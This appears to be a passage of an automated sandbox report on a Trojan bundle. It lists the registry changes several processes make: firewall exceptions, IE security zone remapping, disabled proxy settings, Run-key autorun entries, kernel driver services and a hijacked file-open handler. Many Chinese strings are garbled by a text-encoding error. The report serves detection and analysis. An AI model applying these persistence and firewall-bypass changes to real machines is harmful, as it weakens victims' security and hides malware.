"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process MsiExec.exe:3196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F 5F 66 F5 86 1D 4F A9 6E 9C 71 8F AB 22 A7 D6"

The process candid.exe:1548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 9E FF 18 95 09 FD B0 BF 1A A8 59 18 66 B4 67"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process pczh_107_306.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2]
"DisplayIcon" = "%Program Files%\ainqngz5.2\uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2]
"DisplayVersion" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2]
"DisplayName" = "Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º5.2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\dsrs]
"et" = "2014-8-17"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Ainqngz5.2.exe]
"(Default)" = "%Program Files%\ainqngz5.2\Ainqngz5.2.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\dsrs]
"EX" = "1"
"ED" = "107"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2]
"UninstallString" = "%Program Files%\ainqngz5.2\uninstall.exe"

[HKLM\SOFTWARE\dsrs]
"EN" = "pczh_107_306.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 24 7D D0 AD FB 86 51 91 39 16 F0 CA 30 BA 85"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The process baiduanTray.exe:2772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC EC 8F E5 61 89 CD 3E EE 9C 04 20 BE 33 1A CF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"PAUTime" = "1800000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

The process spkjrjp_30279.exe:1632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 74 40 8A 66 32 9C FD 13 60 E5 0A 5B 55 82 A2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp]
"spkjrjp_30279.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spkjrjp_30279.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¥Å“Â¨Ã§ÂºÂ¿Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp]
"spkjrjp_30279.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spkjrjp_30279.exe:*:Enabled:Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™Ã¥Å“Â¨Ã§ÂºÂ¿Ã¥Â®â€°Ã¨Â£â€¦Ã§Â¨â€¹Ã¥ÂºÂ"

The process yymusic05.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 D8 36 0B 6B C0 73 CF B0 62 9B C7 38 0B 4F 8F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\yyfm0529]
"RD" = "_2014081705"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"yyfm0529_2014081705" = "%Program Files%\yyfm0529\2014081705\yymusic05.exe -mini"

"yyfm0529_News_2014081705" = "%Program Files%\yyfm0529\2014081705\YFMSever.exe -mini"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

"ProxyServer"

"AutoConfigURL"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BoxNews"

"yyfm0529_News"

"YyfmPlay"

"yyfm0529"

The process regsvr32.exe:3184 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 5C E4 36 66 50 F5 4A 72 B7 19 7F 1C B3 FE E2"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\107\bdcomproxy.dll"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

The process BDALeakfixer.exe:3640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E E2 8C 48 C3 C8 8F FA E9 34 86 F7 6D 36 73 6A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process BaiduAn.exe:3516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 30 5E 0B 56 B9 66 18 AE B4 6F 82 2C 23 D8 63"

The process BaiduAn.exe:3208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 D9 26 7C 37 15 32 2B 04 B5 39 7F 5B DB 86 7C"

The process BaiduAnSvc.exe:3884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 66 6A F8 AB 67 FE 92 BE 38 93 EE 0F 8F 41 13"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"DisplayName" = "BDMWrench"

"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\BDMRTP]
"ImagePath" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnSvc.exe -r"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Tag" = "5"
"Group" = "bddriver"
"ImagePath" = "system32\DRIVERS\BDMWrench.sys"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Description" = "BDMWrench"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\BDEnhanceBoost]
"Start" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BaiduAnTray" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe -stmd=3"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\BDMWrench\Security]
[HKLM\System\CurrentControlSet\Services\BDMWrench]
[HKLM\System\CurrentControlSet\Services\BDMWrench\Enum]

The Trojan deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\BDMWrench]
"DeleteFlag"

The process BaiduAnSvc.exe:3732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 A2 73 A3 03 16 9B 36 DB 96 76 52 45 0A D2 12"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process oovmdw_70745.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«]
"Publisher" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥Å“Â¨Ã§ÂºÂ¿Ã§Â½â€˜Ã§Â»Å“Ã¦Å â‚¬Ã¦Å“Â¯Ã¯Â¼Ë†Ã¥Å’â€”Ã¤ÂºÂ¬Ã¯Â¼â€°Ã¦Å“â€°Ã©â„¢ÂÃ¥â€¦Â¬Ã¥ÂÂ¸"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«]
"DisplayVersion" = "2.3.0.2225"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnSvc.exe" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«Ã¦Å“ÂÃ¥Å Â¡Ã§Â¨â€¹Ã¥ÂºÂ"

[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"Type" = "1"
"DisplayName" = "BDMNetMon"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«]
"DisplayIcon" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\app.ico"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"InstallDate" = "2014-8-17"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Tag" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\Unknown\shell\openas\command]
"DelegateExecute" = ""

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"
"Description" = "BDArKit"

[HKCR\metnsd\clsid]
"SequenceID" = "FB 55 2E A1 EA F0 0A 44 8F E2 56 75 C3 E3 C7 3D"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"VirusTime" = "2013.04.05 1216"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"

[HKCR\Unknown\shell\openas\command]
"(Default)" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDAFileHelper.exe -file=%1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"Tag" = "3"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"INSTLANG" = "2052"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"Version" = "2.3.0.2225"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 30 C9 7B 65 74 2D 3E B4 A2 0A A5 D2 8E 5C 53"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"bddownloader.exe" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã©Â«ËœÃ©â‚¬Å¸Ã¤Â¸â€¹Ã¨Â½Â½Ã¥Â¼â€¢Ã¦â€œÅ½"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«]
"UninstallString" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag" = "273"

[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"

"ErrorControl" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"ImagePath" = "system32\DRIVERS\BDMNetMon.sys"
"ErrorControl" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"SupplyID" = "70745"
"InstallDir" = "%Program Files%\Baidu\BaiduAn"

[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"Description" = "BDMNetMon"

[HKLM\System\CurrentControlSet\Services\bd0002]
"ImagePath" = "system32\DRIVERS\bd0002.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_gj" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«]
"DisplayName" = "Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«2.3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"Group" = "bddriver"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, bddriver, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
